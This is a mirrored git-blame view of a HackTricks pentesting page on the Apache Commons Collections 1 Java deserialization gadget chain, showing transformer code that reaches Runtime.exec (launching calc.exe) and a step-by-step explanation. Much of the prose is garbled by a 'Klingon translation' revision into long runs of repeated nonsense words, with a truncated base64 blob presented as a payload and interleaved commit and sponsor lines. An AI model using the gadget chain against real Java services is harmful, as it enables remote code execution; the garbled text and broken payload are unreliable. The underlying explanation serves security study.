Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md

247 lines
48 KiB
Markdown
Raw Normal View History

GitBook: [#3668] No subject
2022-12-03 17:35:56 +00:00
# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
A
2024-02-09 07:14:36 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
GitBook: [#3668] No subject
2022-12-03 17:35:56 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
a
2024-02-08 03:08:28 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
hacktricks twitch
2022-12-05 22:29:21 +00:00
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
GitBook: [#3668] No subject
2022-12-03 17:35:56 +00:00
## Java Transformers to Rutime exec()
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;
public class CommonsCollections1PayloadOnly {
Translated to Klingon
2024-02-10 17:52:19 +00:00
public static void main(String... args) {
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class), //(1)
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
), //(2)
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
), //(3)
new InvokerTransformer("exec",
new Class[]{String.class},
command
) //(4)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
//Execute gadgets
lazyMap.get("anything");
}
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
qaStaHvIS java deserialization payloads Daqaw'a' 'e' vItlhutlh. 'Ivqu' java **Transformer** **class** **ghItlh** 'ej **ghItlh** **'e'** **transform**.\
**Payload** **executed** **equivalent** **'e'** **interesting** **to know** **that**:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
```java
import java.io.*;
import java.util.Base64;
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
public class Main {
public static void main(String[] args) throws Exception {
String payload = "rO0ABXNyAB5qYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvcmllcwEABmJpbmFyeVN0cmVhbXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABnJ1bGVzY2FwZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAB3N0YWNrVHJhbnNwb3J0ABBMamF2YS91dGlsL1RocmVhZDt4cHNyACBqYXZhLnV0aWwuSGFzaE1hcJAAAAAAAAAABDAAVAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAADAAAAAQAAABAAAAAIAAAABAAAAAQAAAAUAAAAGAAAAAQAAABwAAAABAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQA
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
**vaj** **vItlhutlh** **vaj** **vItlhutlh**, **nuq** **vItlhutlh** **vaj** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
### Qatlh
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
So, Qatlh je first payload presented equivalent to those "simple" one-liners?
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
**First** of all, Qatlh can notice in the payload that a **chain (array) of transforms are created**:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
Translated to Klingon
2024-02-10 17:52:19 +00:00
//(1) - Get gadget Class (from Runtime class)
new ConstantTransformer(Runtime.class),
//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
),
//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
),
//(4) - Use the Runtime object to call exec with arbitrary commands
new InvokerTransformer("exec",
new Class[]{String.class},
command
)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
**qaStaHvIS:**
ghorghDI' code vItlhutlhchuq, vaj vaj jatlhpu' 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'e' vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchuq 'ej vItlhutlhchu
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
### Klingon Translation:
**payload**-Da jImej **Map** chelwI' jatlhlaH. SoH **decorate** DaH **LazyMap**-Daq **jImej** chelwI' je. **code**-Daq vItlhutlh **chained transformers** **lazyMap.factory**-Daq **nIvbogh**-lu'be'lu'chugh **jImej** chelwI' je.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
### Markdown Translation:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
In the last section of the payload you can see that a **Map object is created**. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
protected LazyMap(Map map, Transformer factory) {
Translated to Klingon
2024-02-10 17:52:19 +00:00
super(map);
if (factory == null) {
throw new IllegalArgumentException("Factory must not be null");
}
this.factory = factory;
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
jeH lazymap.get("pagh");
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
public Object get(Object key) {
Translated to Klingon
2024-02-10 17:52:19 +00:00
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
'ej vaj code 'oH `transform` DaH
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
public Object transform(Object object) {
Translated to Klingon
2024-02-10 17:52:19 +00:00
for (int i = 0; i < iTransformers.length; i++) {
object = iTransformers[i].transform(object);
}
return object;
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
```
GitBook: [#2876] save
2021-11-30 16:46:07 +00:00
So, remember that inside **factory** we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: [#3668] No subject
2022-12-03 17:35:56 +00:00
### Summary
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:
Translated to Klingon
2024-02-10 17:52:19 +00:00
### Klingon Translation
So, **factory** vItlhutlh **chainedTransformer** **jatlh** **'e'** **transform** **ghaH** **transformers chained** **ghaH** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **'ej** **
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
Object value = "someting";
Translated to Klingon
2024-02-10 17:52:19 +00:00
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
value = new ConstantTransformer(Runtime.class).transform(value); //(1)
value = new InvokerTransformer("getMethod",
Translated to Klingon
2024-02-10 17:52:19 +00:00
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", null}
).transform(value); //(2)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
value = new InvokerTransformer("invoke",
Translated to Klingon
2024-02-10 17:52:19 +00:00
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
).transform(value); //(3)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
value = new InvokerTransformer("exec",
Translated to Klingon
2024-02-10 17:52:19 +00:00
new Class[]{String.class},
command
).transform(value); //(4)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
